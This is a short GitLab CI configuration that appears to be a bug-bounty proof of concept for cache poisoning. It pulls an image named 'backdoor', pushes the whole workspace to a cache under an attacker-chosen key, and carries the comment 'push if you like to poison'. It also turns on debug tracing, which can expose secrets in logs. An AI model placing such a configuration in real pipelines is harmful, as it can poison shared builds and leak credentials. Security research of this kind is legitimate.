image: gcr.io/gcp-bugbounty/backdoor

a:
  script:
  - echo "script"
  - touch A
  cache:
    key: "$A"
    policy: push #or push if you like to poison
    paths:
      - .
  variables:
    CI_DEBUG_TRACE: "true"

